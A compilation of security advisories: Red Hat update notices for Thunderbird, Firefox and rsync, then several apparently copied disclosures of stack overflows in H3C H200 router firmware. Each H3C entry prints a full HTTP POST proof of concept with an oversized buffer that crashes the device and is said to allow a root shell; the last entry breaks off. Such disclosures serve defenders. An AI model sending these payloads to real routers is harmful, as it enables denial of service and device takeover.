Red Hat Security Advisory 2022-6168-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 91.13.0. Issues addressed include spoofing and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:6168-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6168  
Issue date:        2022-08-24  
CVE Names:         CVE-2022-38472 CVE-2022-38473 CVE-2022-38476  
                   CVE-2022-38477 CVE-2022-38478  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v. 8.2) - aarch64, ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 91.13.0.

Security Fix(es):

* Mozilla: Address bar spoofing via XSLT error handling (CVE-2022-38472)

* Mozilla: Cross-origin XSLT Documents would have inherited the parent's  
permissions (CVE-2022-38473)

* Mozilla: Memory safety bugs fixed in Firefox 104 and Firefox ESR 102.2  
(CVE-2022-38477)

* Mozilla: Memory safety bugs fixed in Firefox 104, Firefox ESR 102.2, and  
Firefox ESR 91.13 (CVE-2022-38478)

* Mozilla: Data race and potential use-after-free in PK11_ChangePW  
(CVE-2022-38476)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2120673 - CVE-2022-38472 Mozilla: Address bar spoofing via XSLT error handling  
2120674 - CVE-2022-38473 Mozilla: Cross-origin XSLT Documents would have inherited the parent's permissions  
2120678 - CVE-2022-38476 Mozilla: Data race and potential use-after-free in PK11_ChangePW  
2120695 - CVE-2022-38477 Mozilla: Memory safety bugs fixed in Firefox 104 and Firefox ESR 102.2  
2120696 - CVE-2022-38478 Mozilla: Memory safety bugs fixed in Firefox 104, Firefox ESR 102.2, and Firefox ESR 91.13

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v. 8.2):

Source:  
thunderbird-91.13.0-1.el8_2.src.rpm

aarch64:  
thunderbird-91.13.0-1.el8_2.aarch64.rpm  
thunderbird-debuginfo-91.13.0-1.el8_2.aarch64.rpm  
thunderbird-debugsource-91.13.0-1.el8_2.aarch64.rpm

ppc64le:  
thunderbird-91.13.0-1.el8_2.ppc64le.rpm  
thunderbird-debuginfo-91.13.0-1.el8_2.ppc64le.rpm  
thunderbird-debugsource-91.13.0-1.el8_2.ppc64le.rpm

x86_64:  
thunderbird-91.13.0-1.el8_2.x86_64.rpm  
thunderbird-debuginfo-91.13.0-1.el8_2.x86_64.rpm  
thunderbird-debugsource-91.13.0-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-38472  
https://access.redhat.com/security/cve/CVE-2022-38473  
https://access.redhat.com/security/cve/CVE-2022-38476  
https://access.redhat.com/security/cve/CVE-2022-38477  
https://access.redhat.com/security/cve/CVE-2022-38478  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwa9itzjgjWX9erEAQgzqA//UIEomuMcszc2TKyhbjld5uncoA8DEnPG  
C41AZJy/6PhvluFwEx2+i7MWdpLooqCohtcgm842bA5rYKSyBNHgYxSm9eoWO8se  
unpPuRULYqTyTYbciaciH3jtpMx7/qYNtFOHz7uakJhaG2l1eas9ix3WyECHZ61O  
FRgjEFpKpol/5iKzN8V4bEuuQ4f36AVyQY474CXKK4HwswOrDwoY9y6OLs1KIZKV  
ZlRXTVQdWqqOwEguAd8waPZZbTE8jSuPq0+Cz1G1r1L/OH8hdgVc9qP0NquSdGx4  
DYE0HOFa0cAdWBb2yyDtNGfrjhvywqLJAG73Myopo8YKDELvaUOVBIN0NQxkf+CE  
Qzdt9yR6Y+j30sfAx4HwNMqGyg6yjhTbvms3apzNcz1zevJA6CJd7JxlWximPeWf  
6ROc8BaumkRkYB+mxmGOFlwJO+zGJXNO6d3ddTB9arRb3VJILl3GR8+TWb3wXwvZ  
Zn4WX8aOI/b6HBBEUucz+PhoRc8zS8FqfJcpj7tRks8XwZ4Yws09D2eWJCLpCXsq  
DR+CRcOquxWio0zwAU9+SDIB5XY2I2j7FHNK0a4Vt2uJu7Opb8cmcwr76wwqBdbl  
FZeagxcBO72Xt/XdbKivilWJqqHehQmftLMD/5pf+ETDYm50NyOA8tW/1IbV62tV  
b6ZsEl1S/y0=dI37  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6168-01

Red Hat Security Advisory 2022-6179-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 91.13.0 ESR. Issues addressed include spoofing and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:6179-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6179  
Issue date:        2022-08-24  
CVE Names:         CVE-2022-38472 CVE-2022-38473 CVE-2022-38476  
                   CVE-2022-38477 CVE-2022-38478  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 91.13.0 ESR.

Security Fix(es):

* Mozilla: Address bar spoofing via XSLT error handling (CVE-2022-38472)

* Mozilla: Cross-origin XSLT Documents would have inherited the parent's  
permissions (CVE-2022-38473)

* Mozilla: Memory safety bugs fixed in Firefox 104 and Firefox ESR 102.2  
(CVE-2022-38477)

* Mozilla: Memory safety bugs fixed in Firefox 104, Firefox ESR 102.2, and  
Firefox ESR 91.13 (CVE-2022-38478)

* Mozilla: Data race and potential use-after-free in PK11_ChangePW  
(CVE-2022-38476)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2120673 - CVE-2022-38472 Mozilla: Address bar spoofing via XSLT error handling  
2120674 - CVE-2022-38473 Mozilla: Cross-origin XSLT Documents would have inherited the parent's permissions  
2120678 - CVE-2022-38476 Mozilla: Data race and potential use-after-free in PK11_ChangePW  
2120695 - CVE-2022-38477 Mozilla: Memory safety bugs fixed in Firefox 104 and Firefox ESR 102.2  
2120696 - CVE-2022-38478 Mozilla: Memory safety bugs fixed in Firefox 104, Firefox ESR 102.2, and Firefox ESR 91.13

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
firefox-91.13.0-1.el7_9.src.rpm

x86_64:  
firefox-91.13.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-91.13.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
firefox-91.13.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
firefox-91.13.0-1.el7_9.src.rpm

ppc64:  
firefox-91.13.0-1.el7_9.ppc64.rpm  
firefox-debuginfo-91.13.0-1.el7_9.ppc64.rpm

ppc64le:  
firefox-91.13.0-1.el7_9.ppc64le.rpm  
firefox-debuginfo-91.13.0-1.el7_9.ppc64le.rpm

s390x:  
firefox-91.13.0-1.el7_9.s390x.rpm  
firefox-debuginfo-91.13.0-1.el7_9.s390x.rpm

x86_64:  
firefox-91.13.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-91.13.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:  
firefox-91.13.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
firefox-91.13.0-1.el7_9.src.rpm

x86_64:  
firefox-91.13.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-91.13.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
firefox-91.13.0-1.el7_9.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-38472  
https://access.redhat.com/security/cve/CVE-2022-38473  
https://access.redhat.com/security/cve/CVE-2022-38476  
https://access.redhat.com/security/cve/CVE-2022-38477  
https://access.redhat.com/security/cve/CVE-2022-38478  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwa9pNzjgjWX9erEAQinNw/+NHSbkj9VrFukzXAWq7KU90onZSSTu9kh  
CMdgRVazfVBWicDqzN94kfU5TEUvx6gDxqF9jF1q7tKDP0qabS1IIVl7MosTNwY8  
ruGy0czv31Xu30mQT3TGUDvnk08k3mkNUbqfdPgsinMxiLH1HV/8soeuHHsGC7fP  
KCwPSGrMkSUoYhyvaVKEHSLhNWIWI79nbuMpG6akTrrXY3F1aq8Ebq3XkTesbEqS  
Zgeh2GrNXHQH6B4RG+JpzVulb7LR2LmAmYmQLQViroCybQLS51GcnHuIFZQ2TyFW  
4aXU2/MIbTLX9mgmKv/B5+2FER0DJHkOOEWig8hu2hf2CBjuqbV34+iQCCClSzeN  
3hivzFjbOmEUu/ya8y66WKUmQDJ78d4PT0P7seNxe9JEjvmNtd6f4mttvTp8adPN  
TWKKFvN3NEiYUC/y/0+FFmw6W24NrnBsovmLVOBr/WZYP17yxIAe3+XdfhtTQCW9  
KSJsydd9hm6BOQmjEIF6TupAzRdl9uCR0IGYy39+UnsUSjl+xSiD8CFgaOTRRxbi  
bWO/k63kGBgRC21hXawneSrTFkBrjK5DMW8QuA/0UFBrLjcKjVjl3wMvt/pRLX98  
uG5YGjMM5GU34OG8XbAfYD1eL9xva5eBt82wAGN6FQHIynXDszKwp50nW3pRf5oN  
wyiI5BM/0AgW+I  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6179-01

Red Hat Security Advisory 2022-6171-01 - The rsync utility enables the users to copy and synchronize files locally or across a network. Synchronization with rsync is fast because rsync only sends the differences in files over the network instead of sending whole files. The rsync utility is also used as a mirroring tool.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: rsync security update  
Advisory ID:       RHSA-2022:6171-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6171  
Issue date:        2022-08-24  
CVE Names:         CVE-2022-29154  
====================================================================  
1. Summary:

An update for rsync is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The rsync utility enables the users to copy and synchronize files locally  
or across a network. Synchronization with rsync is fast because rsync only  
sends the differences in files over the network instead of sending whole  
files. The rsync utility is also used as a mirroring tool.

Security Fix(es):

* rsync: remote arbitrary files write inside the directories of connecting  
peers (CVE-2022-29154)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2110928 - CVE-2022-29154 rsync: remote arbitrary files write inside the directories of connecting peers

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
rsync-3.1.3-12.el8_4.2.src.rpm

aarch64:  
rsync-3.1.3-12.el8_4.2.aarch64.rpm  
rsync-debuginfo-3.1.3-12.el8_4.2.aarch64.rpm  
rsync-debugsource-3.1.3-12.el8_4.2.aarch64.rpm

noarch:  
rsync-daemon-3.1.3-12.el8_4.2.noarch.rpm

ppc64le:  
rsync-3.1.3-12.el8_4.2.ppc64le.rpm  
rsync-debuginfo-3.1.3-12.el8_4.2.ppc64le.rpm  
rsync-debugsource-3.1.3-12.el8_4.2.ppc64le.rpm

s390x:  
rsync-3.1.3-12.el8_4.2.s390x.rpm  
rsync-debuginfo-3.1.3-12.el8_4.2.s390x.rpm  
rsync-debugsource-3.1.3-12.el8_4.2.s390x.rpm

x86_64:  
rsync-3.1.3-12.el8_4.2.x86_64.rpm  
rsync-debuginfo-3.1.3-12.el8_4.2.x86_64.rpm  
rsync-debugsource-3.1.3-12.el8_4.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-29154  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYwa9c9zjgjWX9erEAQj0Fw/9FhdSDbGUwpB45PzBPxtsoEMowDW1wPh1  
Oxe0OdniOteew1ss2J44ptNIFLEj2f3xSnnCbOLJnOdc0YMQhUo4Xin9UPolTo/h  
OOI5YVvd05GkfTLZ2cMT6Wp0nGUKa4XjkipQgu70tKXEgZpOa5F00XR7okdYhURK  
j8F8L8LDLIpESqBlXPMKAeCAnVQLcwoJP7xibgBajYFQMZrv66H6diX9ahPra861  
ZbiAi+qCBK9ubu15tLOPWTjyiIXjFsl3WJqoj/fwSfHH4xrw63UJDIxl96PmhI8/  
uFSbL+ybq/EHrWatPn1yhg0LOK5IVvYYGh6KHf+biKR8CHWLOr0Mzq/OfSkMh3+S  
JTjFDFZnZ7H7orzsOHo1gdhk1qVcpBrPfFxUAbhoycuDM1b+ntRyjL4il2Y91+88  
1LLE+O5/EhHeOzyjwf9ZLIJbxAdNmWy7FwXLqqQIQ+7HcDVtcaiVbvD1CSdldxvY  
wD6k21hF6DTK1J4Y4IVdMkOl1r3muFOj3PNdCYd9YOOU4/QVo0Tx8uIlJSlELttd  
G1AtMZHW3jNmedGZWvn6Nz5WW1T7MK5KvbF38IcPDkvOpfpUR43+lk8w7dUuskLo  
ujsCjsF/45qYr/64XlPXWtzsZpybicKuGav2OQxDh5GBTcuhKrcXP8ch4jJhRNYR  
QtwEciwTZWo=7Ras  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6171-01

H3C H200 H200V100R004 was discovered to contain a stack overflow via the function EditWlanMacList.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the EditWlanMacList function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the EditWlanMacList function,the param we entered is formatted using the sscanf function and in the form of %u;%[^;];%[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V5 or V13, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=EditWlanMacList&param=1;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

CVE-2022-37091: vuln/H3C/H200/10 at main · Darry-lang1/vuln

H3C H200 H200V100R004 was discovered to contain a stack overflow via the function SetAPWifiorLedInfoById.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the SetAPWifiorLedInfoById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetAPWifiorLedInfoById function,V8(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V12, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetAPWifiorLedInfoById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

CVE-2022-37092: vuln/H3C/H200/5 at main · Darry-lang1/vuln

H3C H200 H200V100R004 was discovered to contain a stack overflow via the function SetMobileAPInfoById.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the SetMobileAPInfoById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetMobileAPInfoById function,V10(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V17, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetMobileAPInfoById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

CVE-2022-37087: vuln/H3C/H200/6 at main · Darry-lang1/vuln

H3C H200 H200V100R004 was discovered to contain a stack overflow via the function SetAP5GWifiById.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the SetAP5GWifiById function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the SetAP5GWifiById function,V5(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V8, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=SetAP5GWifiById&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

CVE-2022-37088: vuln/H3C/H200/4 at main · Darry-lang1/vuln

H3C H200 H200V100R004 was discovered to contain a stack overflow via the function Asp_SetTimingtimeWifiAndLed.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the Asp\_SetTimingtimeWifiAndLed function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the Asp_SetTimingtimeWifiAndLed function,V11(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V12, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

